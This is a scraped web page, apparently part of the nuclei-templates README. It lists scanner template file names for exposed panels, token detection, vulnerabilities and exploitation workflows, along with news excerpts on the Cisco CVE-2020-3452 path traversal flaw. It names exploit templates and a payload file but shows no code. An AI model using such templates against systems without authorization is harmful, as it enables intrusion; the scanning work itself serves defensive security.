atlassian-crowd-panel.yaml │   ├── cisco-asa-panel.yaml │   ├── citrix-adc-gateway-detect.yaml │   ├── compal.yaml │   ├── crxde.yaml │   ├── docker-api.yaml │   ├── fortinet-fortigate-panel.yaml │   ├── globalprotect-panel.yaml │   ├── grafana-detect.yaml │   ├── jenkins-asyncpeople.yaml │   ├── jmx-console.yaml │   ├── kubernetes-pods.yaml │   ├── mongo-express-web-gui.yaml │   ├── parallels-html-client.yaml │   ├── phpmyadmin-panel.yaml │   ├── pulse-secure-panel.yaml │   ├── rabbitmq-dashboard.yaml │   ├── sap-netweaver-detect.yaml │   ├── sap-recon-detect.yaml │   ├── sophos-fw-version-detect.yaml │   ├── supervpn-panel.yaml │   ├── swagger-panel.yaml │   ├── tikiwiki-cms.yaml │   ├── weave-scope-dashboard-detect.yaml │   └── webeditors.yaml ├── payloads │   └── CVE-2020-6287.xml ├── security-misconfiguration │   ├── basic-cors-flash.yaml │   ├── basic-cors.yaml │   ├── front-page-misconfig.yaml │   ├── jira-service-desk-signup.yaml │   ├── jira-unauthenticated-dashboards.yaml │   ├── jira-unauthenticated-popular-filters.yaml │   ├── jira-unauthenticated-projects.yaml │   ├── jira-unauthenticated-user-picker.yaml │   ├── rabbitmq-default-admin.yaml │   ├── rack-mini-profiler.yaml │   ├── springboot-detect.yaml │   └── wamp-xdebug-detect.yaml ├── subdomain-takeover │   ├── detect-all-takeovers.yaml │   └── s3-subtakeover.yaml ├── technologies │   ├── bigip-config-utility-detect.yaml │   ├── citrix-vpn-detect.yaml │   ├── clockwork-php-page.yaml │   ├── couchdb-detect.yaml │   ├── github-enterprise-detect.yaml │   ├── gitlab-detect.yaml │   ├── graphql.yaml │   ├── home-assistant.yaml │   ├── jaspersoft-detect.yaml │   ├── jira-detect.yaml │   ├── liferay-portal-detect.yaml │   ├── linkerd-badrule-detect.yaml │   ├── linkerd-ssrf-detect.yaml │   ├── netsweeper-webadmin-detect.yaml │   ├── ntlm-directories.yaml │   ├── prometheus-exposed-panel.yaml │   ├── s3-detect.yaml │   ├── sap-netweaver-as-java-detect.yaml │   ├── sap-netweaver-detect.yaml │   ├── sql-server-reporting.yaml │   ├── tech-detect.yaml │   ├── weblogic-detect.yaml │   └── werkzeug-debugger-detect.yaml ├── tokens │   ├── amazon-mws-auth-token-value.yaml │   ├── aws-access-key-value.yaml │   ├── google-api-key.yaml │   ├── http-username-password.yaml │   ├── mailchimp-api-key.yaml │   └── slack-access-token.yaml ├── vulnerabilities │   ├── cached-aem-pages.yaml │   ├── couchdb-adminparty.yaml │   ├── crlf-injection.yaml │   ├── discourse-xss.yaml │   ├── git-config-nginxoffbyslash.yaml │   ├── ibm-infoprint-directory-traversal.yaml │   ├── microstrategy-ssrf.yaml │   ├── moodle-filter-jmol-lfi.yaml │   ├── moodle-filter-jmol-xss.yaml │   ├── nginx-module-vts-xss.yaml │   ├── open-redirect.yaml │   ├── oracle-ebs-bispgraph-file-access.yaml │   ├── pdf-signer-ssti-to-rce.yaml │   ├── rce-shellshock-user-agent.yaml │   ├── rce-via-java-deserialization.yaml │   ├── springboot-actuators-jolokia-xxe.yaml │   ├── symfony-debugmode.yaml │   ├── tikiwiki-reflected-xss.yaml │   ├── tomcat-manager-pathnormalization.yaml │   ├── twig-php-ssti.yaml │   ├── wordpress-duplicator-path-traversal.yaml │   ├── wordpress-wordfence-xss.yaml │   └── x-forwarded-host-injection.yaml └── workflows ├── bigip-pwner-workflow.yaml ├── jira-exploitaiton-workflow.yaml ├── liferay-rce-workflow.yaml ├── netsweeper-preauth-rce-workflow.yaml ├── rabbitmq-workflow.yaml ├── sap-netweaver-workflow.yaml └── springboot-pwner-workflow.yaml 13 directories, 204 templates. Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. Notes: Use YAMLlint (e.g. yamllint) to validate new templates when sending pull requests. Use YAML Formatter (e.g. jsonformatter) to format new templates when sending pull requests. Thanks again for your contribution and keeping the community vibrant. About Community curated list of template files for the nuclei engine to find security vulnerability and fingerprinting the targets. github.com/projectdiscovery/nuclei Topics nuclei-templates nuclei bugbounty security content-bruteforcing Resources Readme License MIT License Releases 43 v4.0.2 Latest 22 hours ago + 42 releases Contributors 67 + 56 contributors

Recent Articles

Attackers Exploiting High-Severity Network Security Flaw, Cisco Warns
Threatpost • Lindsey O'Donnell • 27 Jul 2020

Cisco is warning that a high-severity flaw in its network security software is being actively exploited – allowing remote, unauthenticated attackers to access sensitive data.
Patches for the vulnerability (CVE-2020-3452) in question, which ranks 7.5 out of 10 on the CVSS scale, were released last Wednesday. However, attackers have since been targeting vulnerable versions of the software, where the patches have not yet been applied.
“The Cisco Product Security Incident Response Te...

Cisco patches ASA/FTD firewall flaw actively exploited by hackers
BleepingComputer • Sergiu Gatlan • 24 Jul 2020

Cisco fixed a high severity and actively exploited read-only path traversal vulnerability affecting the web services interface of two of its firewall products.
If successfully exploited, the security vulnerability tracked as CVE-2020-3452 may allow unauthenticated attackers to read sensitive files on unpatched systems through directory traversal attacks.



PLAY


...

Cisco Network Security Flaw Leaks Sensitive Data
Threatpost • Lindsey O'Donnell • 23 Jul 2020

A high-severity vulnerability in Cisco’s network security software could lay bare sensitive data – such as WebVPN configurations and web cookies –  to remote, unauthenticated attackers.
The flaw exists in the web services interface of Cisco’s Firepower Threat Defense (FTD) software, which is part of its suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security...

The Register

In Brief Cisco this week emitted fixes for potentially serious vulnerabilities, one of which is already being exploited in the wild.
The under-attack bug is CVE-2020-3452, a path-traversal flaw in Switchzilla's Adaptive Security Appliance and Firepower Threat Defense software that can be used to "read sensitive files on a targeted system." While there was no publicly available exploit code for the high-severity bug when first publicized, a day after issuing its advisory, Cisco said the fla...